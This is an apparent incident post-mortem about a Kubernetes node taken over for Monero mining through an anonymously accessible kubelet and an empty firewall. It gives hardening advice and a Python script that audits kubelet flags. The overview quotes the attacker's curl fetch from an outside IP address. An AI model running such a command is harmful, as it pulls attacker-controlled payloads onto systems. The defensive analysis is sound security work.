How a Misconfigured Kubelet Led to Crypto Mining on Our Kubernetes Node – Lessons Learned
A self‑built Kubernetes cluster was compromised when an unprotected node with empty iptables and a kubelet that allowed anonymous API access was hijacked for Monero mining, prompting a detailed post‑mortem, root‑cause analysis, and hardening recommendations.
Incident Overview
During routine operations we discovered that one machine in our self‑built Kubernetes cluster had been compromised and was being used to mine Monero cryptocurrency. The attacker executed a hidden binary and fetched additional data via curl -s http://45.9.148.35/scan_threads.dat.
Immediate Response
We stopped Docker on the affected host and isolated the environment, intending to dump the malicious process for later forensic analysis.
Root‑Cause Investigation
Empty iptables: The node had no firewall rules, leaving every port reachable.
Kubelet exposed: The kubelet service was running without authentication, so anonymous requests to its API were accepted.
Misconfiguration: The line in the kubelet startup file that disables anonymous access had been commented out, so the protection never took effect.
Log excerpts and screenshots showed the anomalous activity and the commented‑out configuration line.
Improvement Plan
Enforce host‑level firewall rules that deny all inbound traffic by default and only open required ports after verification.
Avoid assigning public IPs to nodes that do not need external exposure.
Configure services, especially kubelet, to bind only to internal network interfaces instead of 0.0.0.0.
Disable anonymous access to kubelet and other APIs; implement proper authentication and authorization mechanisms.
Standardize operational procedures by using scripted automation rather than manual ad‑hoc changes to production environments.
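As an added example (not code from the original article), a small Python audit of a kubelet systemd startup file: it skips comment lines exactly as systemd does, so the commented-out anonymous-auth setting from the incident is reported as absent, and it flags the kubelet defaults the improvement plan targets. The unit-file layout and both sample units are constructed assumptions.

```python
import re

# Added example (not from the article): audit a kubelet startup file for the
# misconfiguration in the post-mortem. File format and contents are assumptions.
FLAG_RE = re.compile(r"--([a-z0-9-]+)(?:=([^\s\"']+))?")

def effective_kubelet_flags(unit_text):
    """Flags that actually reach the kubelet: systemd ignores lines starting
    with '#' or ';', so a flag on such a line (like the commented-out
    anonymous-access setting in the incident) has no effect. Bare flag == true."""
    flags = {}
    for line in unit_text.splitlines():
        if line.lstrip().startswith(("#", ";")):
            continue  # comment line: nothing on it is active
        for name, value in FLAG_RE.findall(line):
            flags[name] = value or "true"
    return flags

def audit_kubelet_startup(unit_text):
    """Map each risky flag to a finding; absent flags use the kubelet defaults."""
    flags = effective_kubelet_flags(unit_text)
    findings = {}
    if flags.get("anonymous-auth", "true") == "true":
        findings["anonymous-auth"] = "anonymous requests to the kubelet API are accepted"
    if flags.get("address", "0.0.0.0") in ("0.0.0.0", "::"):
        findings["address"] = "kubelet API listens on every interface, public IP included"
    if flags.get("authorization-mode", "AlwaysAllow") == "AlwaysAllow":
        findings["authorization-mode"] = "every request is authorized, anonymous ones too"
    return findings

# Constructed sample: the blocking setting is present but commented out.
VULNERABLE_UNIT = """\
[Service]
ExecStart=/usr/local/bin/kubelet \\
  --address=0.0.0.0 \\
  --port=10250
# --anonymous-auth=false
"""

# Constructed sample: hardened as the improvement plan recommends.
HARDENED_UNIT = """\
[Service]
ExecStart=/usr/local/bin/kubelet \\
  --address=10.0.0.12 \\
  --anonymous-auth=false \\
  --authorization-mode=Webhook \\
  --client-ca-file=/etc/kubernetes/pki/ca.crt
"""
```

Running audit_kubelet_startup(VULNERABLE_UNIT) reports all three flags, while the hardened unit produces no findings.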
Conclusion
The breach gave the attacker full control over Docker on the compromised node, highlighting the severe risk of misconfigured Kubernetes components. Strengthening host firewalls, limiting exposure of kubelet APIs, and adopting disciplined operational practices are essential to prevent similar incidents.